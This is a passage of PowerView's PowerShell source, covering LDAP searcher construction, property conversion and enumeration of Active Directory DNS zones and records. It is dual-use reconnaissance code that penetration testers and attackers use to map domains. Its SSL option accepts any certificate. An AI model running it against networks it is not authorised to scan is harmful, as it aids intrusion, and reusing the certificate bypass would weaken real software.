-as $GroupTypeEnum\n            }\n            elseif ($_ -eq 'samaccounttype') {\n                $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum\n            }\n            elseif ($_ -eq 'objectguid') {\n                # convert the GUID to a string\n                $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid\n            }\n            elseif ($_ -eq 'useraccountcontrol') {\n                $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum\n            }\n            elseif ($_ -eq 'ntsecuritydescriptor') {\n                # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0\n                $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0\n                if ($Descriptor.Owner) {\n                    $ObjectProperties['OwnerSID'] = $Descriptor.Owner\n                    $OwnerObject = Get-DomainObject $Descriptor.Owner\n                    $ObjectProperties['OwnerName'] = $OwnerObject.samaccountname\n                }\n                if ($Descriptor.Group) {\n                    $ObjectProperties['Group'] = $Descriptor.Group\n                }\n                if ($Descriptor.DiscretionaryAcl) {\n                    $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl\n                }\n                if ($Descriptor.SystemAcl) {\n                    $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl\n                }\n            }\n            elseif ($_ -eq 'accountexpires') {\n                if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) {\n                    $ObjectProperties[$_] = \"NEVER\"\n                }\n                else {\n                    $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0])\n                }\n            }\n            elseif ($_ -eq 'lockouttime') {\n                if ($Properties[$_][0] -eq 0 -or $Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) {\n                    $ObjectProperties[$_] = \"UNLOCKED\"\n                }\n                else {\n                    $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0])\n                }\n            }\n            elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime')  -or ($_ -eq 'ms-mcs-admpwdexpirationtime')) {\n                # convert timestamps\n                if ($Properties[$_][0] -is [System.MarshalByRefObject]) {\n                    # if we have a System.__ComObject\n                    $Temp = $Properties[$_][0]\n                    [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)\n                    [Int32]$Low  = $Temp.GetType().InvokeMember('LowPart',  [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)\n                    $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64](\"0x{0:x8}{1:x8}\" -f $High, $Low)))\n                }\n                else {\n                    # otherwise just a string\n                    $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))\n                }\n            }\n            elseif ($_ -eq 'logonhours') {\n                $ObjectProperties[$_] = Convert-LogonHours -LogonHours $Properties[$_][0]\n            }\n            elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) {\n                # try to convert misc com objects\n                $Prop = $Properties[$_]\n                try {\n                    $Temp = $Prop[$_][0]\n                    [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)\n                    [Int32]$Low  = $Temp.GetType().InvokeMember('LowPart',  [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)\n                    $ObjectProperties[$_] = [Int64](\"0x{0:x8}{1:x8}\" -f $High, $Low)\n                }\n                catch {\n                    Write-Verbose \"[Convert-LDAPProperty] error: $_\"\n                    $ObjectProperties[$_] = $Prop[$_]\n                }\n            }\n            elseif ($Properties[$_].count -eq 1) {\n                $ObjectProperties[$_] = $Properties[$_][0]\n            }\n            else {\n                $ObjectProperties[$_] = $Properties[$_]\n            }\n        }\n    }\n    try {\n        New-Object -TypeName PSObject -Property $ObjectProperties\n    }\n    catch {\n        Write-Warning \"[Convert-LDAPProperty] Error parsing LDAP properties : $_\"\n    }\n}\n\n\n########################################################\n#\n# Domain info functions below.\n#\n########################################################\n\nfunction Get-DomainSearcher {\n<#\n.SYNOPSIS\n\nHelper used by various functions that builds a custom AD searcher object.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Domain  \n\n.DESCRIPTION\n\nTakes a given domain and a number of customizations and returns a\nSystem.DirectoryServices.DirectorySearcher object. This function is used\nheavily by other LDAP/ADSI searcher functions (Verb-Domain*).\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER SearchBasePrefix\n\nSpecifies a prefix for the LDAP search string (i.e. \"CN=Sites,CN=Configuration\").\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to for the search.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nUse SSL Connection to LDAP Server\n\n.EXAMPLE\n\nGet-DomainSearcher -Domain testlab.local\n\nReturn a searcher for all objects in testlab.local.\n\n.EXAMPLE\n\nGet-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon'\n\nReturn a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties.\n\n.EXAMPLE\n\nGet-DomainSearcher -SearchBase \"LDAP://OU=secret,DC=testlab,DC=local\"\n\nReturn a searcher that searches through the specific ADS/LDAP search base (i.e. OU).\n\n.OUTPUTS\n\nSystem.DirectoryServices.DirectorySearcher\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('System.DirectoryServices.DirectorySearcher')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $SearchBasePrefix,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit = 120,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL\n    )\n\n    PROCESS {\n        if ($PSBoundParameters['Domain']) {\n            $TargetDomain = $Domain\n\n            if ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) {\n                # see if we can grab the user DNS logon domain from environment variables\n                $UserDomain = $ENV:USERDNSDOMAIN\n                if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $UserDomain) {\n                    $BindServer = \"$($ENV:LOGONSERVER -replace '\\\\','').$UserDomain\"\n                }\n            }\n        }\n        elseif ($PSBoundParameters['Credential']) {\n            # if not -Domain is specified, but -Credential is, try to retrieve the current domain name with Get-Domain\n            $DomainObject = Get-Domain -Credential $Credential\n            $BindServer = ($DomainObject.PdcRoleOwner).Name\n            $TargetDomain = $DomainObject.Name\n        }\n        elseif ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) {\n            # see if we can grab the user DNS logon domain from environment variables\n            $TargetDomain = $ENV:USERDNSDOMAIN\n            if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $TargetDomain) {\n                $BindServer = \"$($ENV:LOGONSERVER -replace '\\\\','').$TargetDomain\"\n            }\n        }\n        else {\n            # otherwise, resort to Get-Domain to retrieve the current domain object\n            write-verbose \"get-domain\"\n            $DomainObject = Get-Domain\n            $BindServer = ($DomainObject.PdcRoleOwner).Name\n            $TargetDomain = $DomainObject.Name\n        }\n\n        if ($PSBoundParameters['Server']) {\n            # if there's not a specified server to bind to, try to pull a logon server from ENV variables\n            $BindServer = $Server\n        }\n\n        if ($PSBoundParameters['SSL']) {\n            if ([string]::IsNullOrEmpty($BindServer)) {\n                $DomainObject = Get-Domain\n                $BindServer = ($DomainObject.PdcRoleOwner).Name\n            }\n            [System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n            Write-Verbose \"[Get-DomainSearcher] Connecting to $($BindServer):636\"\n            $Searcher = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList \"$($BindServer):636\"\n            $Searcher.SessionOptions.SecureSocketLayer = $true;\n            $Searcher.SessionOptions.VerifyServerCertificate = { $true }\n            $Searcher.SessionOptions.DomainName = $TargetDomain\n            $Searcher.AuthType = [System.DirectoryServices.Protocols.AuthType]::Negotiate\n            if ($PSBoundParameters['Credential']) {\n                $Searcher.Bind($Credential)\n            }\n            else {\n                $Searcher.Bind()\n            }\n        }\n        else {\n            $SearchString = 'LDAP://'\n\n            if ($BindServer -and ($BindServer.Trim() -ne '')) {\n                $SearchString += $BindServer\n                if ($TargetDomain) {\n                    $SearchString += '/'\n                }\n            }\n\n            if ($PSBoundParameters['SearchBasePrefix']) {\n                $SearchString += $SearchBasePrefix + ','\n            }\n\n            if ($PSBoundParameters['SearchBase']) {\n                if ($SearchBase -Match '^GC://') {\n                    # if we're searching the global catalog, get the path in the right format\n                    $DN = $SearchBase.ToUpper().Trim('/')\n                    $SearchString = ''\n                }\n                else {\n                    if ($SearchBase -match '^LDAP://') {\n                        if ($SearchBase -match \"LDAP://.+/.+\") {\n                            $SearchString = ''\n                            $DN = $SearchBase\n                        }\n                        else {\n                            $DN = $SearchBase.SubString(7)\n                        }\n                    }\n                    else {\n                        $DN = $SearchBase\n                    }\n                }\n            }\n            else {\n                # transform the target domain name into a distinguishedName if an ADS search base is not specified\n                if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) {\n                    $DN = \"DC=$($TargetDomain.Replace('.', ',DC='))\"\n                }\n            }\n\n            $SearchString += $DN\n            Write-Verbose \"[Get-DomainSearcher] search base: $SearchString\"\n\n            if ($Credential -ne [Management.Automation.PSCredential]::Empty) {\n                Write-Verbose \"[Get-DomainSearcher] Using alternate credentials for LDAP connection\"\n                # bind to the inital search object using alternate credentials\n                $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)\n                $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)\n            }\n            else {\n                # bind to the inital object using the current credentials\n                $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n            }\n\n            $Searcher.PageSize = $ResultPageSize\n            $Searcher.SearchScope = $SearchScope\n            $Searcher.CacheResults = $False\n            $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All\n\n            if ($PSBoundParameters['ServerTimeLimit']) {\n                $Searcher.ServerTimeLimit = $ServerTimeLimit\n            }\n\n            if ($PSBoundParameters['Tombstone']) {\n                $Searcher.Tombstone = $True\n            }\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                $Searcher.filter = $LDAPFilter\n            }\n\n            if ($PSBoundParameters['SecurityMasks']) {\n                $Searcher.SecurityMasks = Switch ($SecurityMasks) {\n                    'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl }\n                    'Group' { [System.DirectoryServices.SecurityMasks]::Group }\n                    'None' { [System.DirectoryServices.SecurityMasks]::None }\n                    'Owner' { [System.DirectoryServices.SecurityMasks]::Owner }\n                    'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl }\n                }\n            }\n\n            if ($PSBoundParameters['Properties']) {\n                # handle an array of properties to load w/ the possibility of comma-separated strings\n                $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') }\n                $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad))\n            }\n        }\n\n        $Searcher\n    }\n}\n\n\nfunction Convert-DNSRecord {\n<#\n.SYNOPSIS\n\nHelpers that decodes a binary DNS record blob.\n\nAuthor: Michael B. Smith, Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nDecodes a binary blob representing an Active Directory DNS entry.\nUsed by Get-DomainDNSRecord.\n\nAdapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1\n\n.PARAMETER DNSRecord\n\nA byte array representing the DNS record.\n\n.OUTPUTS\n\nSystem.Management.Automation.PSCustomObject\n\nOutputs custom PSObjects with detailed information about the DNS record entry.\n\n.LINK\n\nhttps://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1\n#>\n\n    [OutputType('System.Management.Automation.PSCustomObject')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]\n        [Byte[]]\n        $DNSRecord\n    )\n\n    BEGIN {\n        function Get-Name {\n            [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')]\n            [CmdletBinding()]\n            Param(\n                [Byte[]]\n                $Raw\n            )\n\n            [Int]$Length = $Raw[0]\n            [Int]$Segments = $Raw[1]\n            [Int]$Index =  2\n            [String]$Name  = ''\n\n            while ($Segments-- -gt 0)\n            {\n                [Int]$SegmentLength = $Raw[$Index++]\n                while ($SegmentLength-- -gt 0) {\n                    $Name += [Char]$Raw[$Index++]\n                }\n                $Name += \".\"\n            }\n            $Name\n        }\n    }\n\n    PROCESS {\n        # $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)\n        $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)\n        $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)\n\n        $TTLRaw = $DNSRecord[12..15]\n\n        # reverse for big endian\n        $Null = [array]::Reverse($TTLRaw)\n        $TTL = [BitConverter]::ToUInt32($TTLRaw, 0)\n\n        $Age = [BitConverter]::ToUInt32($DNSRecord, 20)\n        if ($Age -ne 0) {\n            $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()\n        }\n        else {\n            $TimeStamp = '[static]'\n        }\n\n        $DNSRecordObject = New-Object PSObject\n\n        if ($RDataType -eq 1) {\n            $IP = \"{0}.{1}.{2}.{3}\" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]\n            $Data = $IP\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'\n        }\n\n        elseif ($RDataType -eq 2) {\n            $NSName = Get-Name $DNSRecord[24..$DNSRecord.length]\n            $Data = $NSName\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'\n        }\n\n        elseif ($RDataType -eq 5) {\n            $Alias = Get-Name $DNSRecord[24..$DNSRecord.length]\n            $Data = $Alias\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME'\n        }\n\n        elseif ($RDataType -eq 6) {\n            # TODO: how to implement properly? nested object?\n            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA'\n        }\n\n        elseif ($RDataType -eq 12) {\n            $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length]\n            $Data = $Ptr\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR'\n        }\n\n        elseif ($RDataType -eq 13) {\n            # TODO: how to implement properly? nested object?\n            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO'\n        }\n\n        elseif ($RDataType -eq 15) {\n            # TODO: how to implement properly? nested object?\n            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX'\n        }\n\n        elseif ($RDataType -eq 16) {\n            [string]$TXT  = ''\n            [int]$SegmentLength = $DNSRecord[24]\n            $Index = 25\n\n            while ($SegmentLength-- -gt 0) {\n                $TXT += [char]$DNSRecord[$index++]\n            }\n\n            $Data = $TXT\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT'\n        }\n\n        elseif ($RDataType -eq 28) {\n            # TODO: how to implement properly? nested object?\n            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA'\n        }\n\n        elseif ($RDataType -eq 33) {\n            # TODO: how to implement properly? nested object?\n            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV'\n        }\n\n        else {\n            $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))\n            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN'\n        }\n\n        $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial\n        $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL\n        $DNSRecordObject | Add-Member Noteproperty 'Age' $Age\n        $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp\n        $DNSRecordObject | Add-Member Noteproperty 'Data' $Data\n        $DNSRecordObject\n    }\n}\n\n\nfunction Get-DomainDNSZone {\n<#\n.SYNOPSIS\n\nEnumerates the Active Directory DNS zones for a given domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty  \n\n.PARAMETER Domain\n\nThe domain to query for zones, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to for the search.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainDNSZone\n\nRetrieves the DNS zones for the current domain.\n\n.EXAMPLE\n\nGet-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local\n\nRetrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.\n\n.OUTPUTS\n\nPowerView.DNSZone\n\nOutputs custom PSObjects with detailed information about the DNS zone.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.DNSZone')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        $SearcherArguments = @{\n            'LDAPFilter' = '(objectClass=dnsZone)'\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $DNSSearcher1 = Get-DomainSearcher @SearcherArguments\n\n        if ($DNSSearcher1) {\n            if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher1.FindOne()  }\n            else { $Results = $DNSSearcher1.FindAll() }\n            $Results | Where-Object {$_} | ForEach-Object {\n                $Out = Convert-LDAPProperty -Properties $_.Properties\n                $Out | Add-Member NoteProperty 'ZoneName' $Out.name\n                $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')\n                $Out\n            }\n\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainDFSShare] Error disposing of the Results object: $_\"\n                }\n            }\n            $DNSSearcher1.dispose()\n        }\n\n        $SearcherArguments['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones'\n        $DNSSearcher2 = Get-DomainSearcher @SearcherArguments\n\n        if ($DNSSearcher2) {\n            try {\n                if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher2.FindOne() }\n                else { $Results = $DNSSearcher2.FindAll() }\n                $Results | Where-Object {$_} | ForEach-Object {\n                    $Out = Convert-LDAPProperty -Properties $_.Properties\n                    $Out | Add-Member NoteProperty 'ZoneName' $Out.name\n                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')\n                    $Out\n                }\n                if ($Results) {\n                    try { $Results.dispose() }\n                    catch {\n                        Write-Verbose \"[Get-DomainDNSZone] Error disposing of the Results object: $_\"\n                    }\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-DomainDNSZone] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'\"\n            }\n            $DNSSearcher2.dispose()\n        }\n    }\n}\n\n\nfunction Get-DomainDNSRecord {\n<#\n.SYNOPSIS\n\nEnumerates the Active Directory DNS records for a given zone.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord  \n\n.DESCRIPTION\n\nGiven a specific Active Directory DNS zone name, query for all 'dnsNode'\nLDAP entries using that zone as the search base. Return all DNS entry results\nand use Convert-DNSRecord to try to convert the binary DNS record blobs.\n\n.PARAMETER ZoneName\n\nSpecifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).\n\n.PARAMETER Domain\n\nThe domain to query for zones, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to for the search.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainDNSRecord -ZoneName testlab.local\n\nRetrieve all records for the testlab.local zone.\n\n.EXAMPLE\n\nGet-DomainDNSZone | Get-DomainDNSRecord\n\nRetrieve all records for all zones in the current domain.\n\n.EXAMPLE\n\nGet-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local\n\nRetrieve all records for all zones in the dev.testlab.local domain.\n\n.OUTPUTS\n\nPowerView.DNSRecord\n\nOutputs custom PSObjects with detailed information about the DNS record entry.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.DNSRecord')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0,  Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ZoneName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties = 'name,distinguishedname,dnsrecord,whencreated,whenchanged',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        $SearcherArguments = @{\n            'LDAPFilter' = '(objectClass=dnsNode)'\n            'SearchBasePrefix' = \"DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones\"\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $DNSSearcher = Get-DomainSearcher @SearcherArguments\n\n        if ($DNSSearcher) {\n            if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher.FindOne() }\n            else { $Results = $DNSSearcher.FindAll() }\n            $Results | Where-Object {$_} | ForEach-Object {\n                try {\n                    $Out = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged\n                    $Out | Add-Member NoteProperty 'ZoneName' $ZoneName\n\n                    # convert the record and extract the properties\n                    if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) {\n                        # TODO: handle multiple nested records properly?\n                        $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord[0]\n                    }\n                    else {\n                        $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord\n                    }\n\n                    if ($Record) {\n                        $Record.PSObject.Properties | ForEach-Object {\n                            $Out | Add-Member NoteProperty $_.Name $_.Value\n                        }\n                    }\n\n                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord')\n                    $Out\n                }\n                catch {\n                    Write-Warning \"[Get-DomainDNSRecord] Error: $_\"\n                    $Out\n                }\n            }\n\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainDNSRecord] Error disposing of the Results object: $_\"\n                }\n            }\n            $DNSSearcher.dispose()\n        }\n    }\n}\n\n\nfunction Get-Domain {\n<#\n.SYNOPSIS\n\nReturns the domain object for the current (or specified) domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nReturns a System.DirectoryServices.ActiveDirectory.Domain object for the current\ndomain or the domain specified with -Domain X.\n\n.PARAMETER Domain\n\nSpecifies the domain name to query for, defaults to the current domain.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-Domain -Domain testlab.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-Domain -Credential $Cred\n\n.OUTPUTS\n\nSystem.DirectoryServices.ActiveDirectory.Domain\n\nA complex .NET domain object.\n\n.LINK\n\nhttp://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG\n#>\n\n    [OutputType([System.DirectoryServices.ActiveDirectory.Domain])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        if ($PSBoundParameters['Credential']) {\n\n            Write-Verbose 